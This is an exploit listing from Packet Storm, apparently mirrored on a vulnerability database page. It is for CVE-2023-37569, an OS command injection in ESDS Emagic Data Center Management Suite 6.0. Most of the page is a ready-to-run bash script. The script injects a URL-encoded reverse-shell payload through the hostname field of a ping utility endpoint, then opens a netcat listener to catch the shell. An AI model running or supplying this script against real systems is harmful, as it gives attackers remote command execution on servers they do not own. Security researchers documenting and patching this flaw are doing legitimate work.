Lucene search
Thewhiteh4t, Shubham PandeyPACKETSTORM:174084HistoryAug 09, 2023 - 12:00 a.m.
Emagic Data Center Management Suite 6.0 Remote Command Execution
2023-08-0900:00:00
thewhiteh4t, Shubham Pandey
packetstormsecurity.com
166
command injection
esds emagic
shubham pandey
remote execution
cve-2023-37569
kali linux
EPSS
0.01
Percentile
84.0%
`# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
# Date: 03-08-2023
# Exploit Author: Shubham Pandey & thewhiteh4t
# Vendor Homepage: https://www.esds.co.in/enlight360
# Version: 6.0.0
# Tested on: Kali Linux
# CVE : CVE-2023-37569
URL=$1
LHOST=$2
LPORT=$3
echo "*****************************"
echo "* ESDS eMagic 6.0.0 RCE *"
echo "* > CVE-2023-37569 *"
echo "* > Shubham & thewhiteh4t *"
echo "*****************************"
if [ $# -lt 3 ]; then
echo """
USAGE :
./exploit.sh http://<IP> <LHOST> <LPORT>
./exploit.sh http://192.168.0.10 192.168.0.20 1337
"""
exit 1
fi
url="$1/index.php/monitor/operations/utilities/"
echo "[+] URL : $URL"
echo "[+] LHOST : $LHOST"
echo "[+] LPORT : $LPORT"
echo
payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
post_data="utility=ping&operations=yes&hostname=%3B%20$payload¶m_before=¶m_after=&probe_id=1&rndval=1682490204846"
echo "[!] Triggering exploit..."
echo $url
(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
echo "[+] Catching shell..."
nc -lvp 4444
`
Related
prion
prion
Design/Logic Flaw
2023-08-08 09:15:00
cvelist
cvelist
cve
cve
CVE-2023-37569
2023-08-08 09:15:10
exploitdb
exploitdb
Emagic Data Center Management Suite v6.0 - OS Command Injection
2023-08-08 00:00:00
nvd
nvd
CVE-2023-37569
2023-08-08 09:15:10
zdt
zdt
Emagic Data Center Management Suite v6.0 - OS Command Injection Exploit
2023-08-08 00:00:00